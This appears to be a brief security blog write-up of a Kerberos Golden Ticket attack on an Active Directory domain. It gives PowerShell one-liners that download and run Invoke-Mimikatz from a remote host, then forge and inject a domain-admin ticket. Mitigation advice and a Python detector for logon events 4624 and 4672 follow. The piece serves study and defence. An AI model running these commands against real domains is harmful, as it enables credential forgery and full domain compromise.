Golden Ticket Attack

Figure 1: Obtained Hash and SID
Figure 2: Failed Access

iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1-5-21-XXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /krbtgt:<hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080"'

iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'

Figure 3: Created Golden Ticket
Figure 4: Injected Golden Ticket
Figure 5: Validated Access

Mitigation:

  • Reset the krbtgt password twice to invalidate existing golden tickets
  • Review and filter Security Event IDs 4624 and 4672
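
One way to act on the second point, as an added example that is not part of the original article: correlate 4624 logons with 4672 special-privilege events on the same logon ID and flag accounts that do not exist in the directory, as with the made-up user name in the ticket above. The event dictionaries, the `KNOWN_ACCOUNTS` export and the function name are assumptions for illustration; the sample events are constructed.

```python
# Constructed sample events (not from the article), shaped like the EventData
# fields of exported Security log records for Event IDs 4624 and 4672.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "Alice",
     "TargetLogonId": "0x3e4a1", "LogonType": 3, "IpAddress": "192.168.23.50"},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "IDontExist23",
     "TargetLogonId": "0x5f2b7", "LogonType": 3, "IpAddress": "192.168.23.77"},
    {"EventID": 4672, "Computer": "DC01", "SubjectUserName": "IDontExist23",
     "SubjectLogonId": "0x5f2b7",
     "PrivilegeList": "SeDebugPrivilege SeTcbPrivilege"},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "da-bob",
     "TargetLogonId": "0x61c09", "LogonType": 3, "IpAddress": "192.168.23.10"},
    {"EventID": 4672, "Computer": "DC01", "SubjectUserName": "da-bob",
     "SubjectLogonId": "0x61c09", "PrivilegeList": "SeDebugPrivilege"},
]

# Assumed export of every account name in the directory (users, service and
# machine accounts); in practice this comes from an AD query, not a literal.
KNOWN_ACCOUNTS = {"alice", "da-bob", "administrator", "DC01$"}


def find_suspect_logons(events, known_accounts):
    """Return 4624 logons by accounts missing from the directory, with the
    privileges granted to the same logon session by a matching 4672 event."""
    known = {name.lower() for name in known_accounts}
    # 4672 is logged for the new session, so key it by host and logon ID.
    privileged = {(e["Computer"], e["SubjectLogonId"]): e["PrivilegeList"]
                  for e in events if e["EventID"] == 4672}
    findings = []
    for e in events:
        if e["EventID"] != 4624 or e["TargetUserName"].lower() in known:
            continue
        key = (e["Computer"], e["TargetLogonId"])
        findings.append({
            "user": e["TargetUserName"],
            "computer": e["Computer"],
            "source_ip": e["IpAddress"],
            "logon_id": e["TargetLogonId"],
            "privileged": key in privileged,
            "privileges": privileged.get(key, ""),
        })
    # Unknown account plus special privileges is the strongest signal.
    return sorted(findings, key=lambda f: not f["privileged"])


if __name__ == "__main__":
    for finding in find_suspect_logons(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(finding)
```
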

Cyber Security Enthusiast
Mike Bond